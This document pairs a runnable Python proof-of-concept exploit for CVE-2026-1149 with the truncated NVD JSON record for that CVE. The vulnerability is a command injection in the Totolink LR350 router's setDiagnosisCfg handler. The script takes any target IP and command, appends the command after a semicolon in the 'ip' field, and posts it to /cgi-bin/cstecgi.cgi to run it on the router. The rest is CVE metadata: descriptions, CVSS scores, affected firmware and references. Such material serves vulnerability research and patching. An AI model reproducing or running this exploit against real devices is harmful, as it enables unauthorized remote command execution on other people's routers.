CVE-2026-1149

#!/usr/bin/env python3 """ CVE-2026-1149 PoC - Totolink LR350 setDiagnosisCfg Command Injection Vulnerable Version: 9.3.5u.6369_B20220309 Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-1149 """ import requests import sys import argparse def exploit(target_ip, target_port=80, command="id", proto="http"): """ Exploit the command injection vulnerability in setDiagnosisCfg Args: target_ip: Target router IP address target_port: Target router web port (default: 80) command: Command to execute on the target proto: Protocol to use (http or https) """ url = f"{proto}://{target_ip}:{target_port}/cgi-bin/cstecgi.cgi" # Payload construction: inject command via ip parameter # The ip parameter is used in ping command without sanitization payload = f";{command}" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } data = { "topicurl": "setDiagnosisCfg", "ip": payload } print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Command: {command}") print(f"[*] URL: {url}") try: print("[*] Sending exploit payload...") response = requests.post(url, json=data, headers=headers, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body:\n{response.text}") return response.json() except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None def main(): parser = argparse.ArgumentParser(description="CVE-2026-1149 PoC") parser.add_argument("target", help="Target IP address") parser.add_argument("-p", "--port", type=int, default=80, help="Target port (default: 80)") parser.add_argument("-c", "--command", default="id", help="Command to execute (default: id)") parser.add_argument("-s", "--ssl", action="store_true", help="Use HTTPS") args = parser.parse_args() proto = "https" if args.ssl else "http" exploit(args.target, args.port, args.command, proto) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-1149", "sourceIdentifier": "[email protected]", "published": "2026-01-19T10:16:08.877", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Totolink LR350 9.3.5u.6369_B20220309. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument ip leads to command injection. The attack can be initiated remotely. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Se identificó una vulnerabilidad en Totolink LR350 9.3.5u.6369_B20220309. Este problema afecta a la función setDiagnosisCfg del archivo /cgi-bin/cstecgi.cgi del componente POST Request Handler. La manipulación del argumento ip conduce a inyección de comandos. El ataque puede iniciarse remotamente. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:totolink:lr350_firmware:9.3.5u.6369_b20220309:*:*:*:*:*:*:*", "matchCriteriaId": "6E7C618F-D415-4075-96A5-45E44B52FB62"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:totolink:lr350:-:*:*:*:*:*:*:*", "matchCriteriaId": "4CA0663B-3F55-44EF-AF32-F83AB0411748"}]}]}], "references": [{"url": "https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setDiagnosisCfg-2e453a41781f800d9ba9c6da80b55276?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341742", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/ ... (truncated)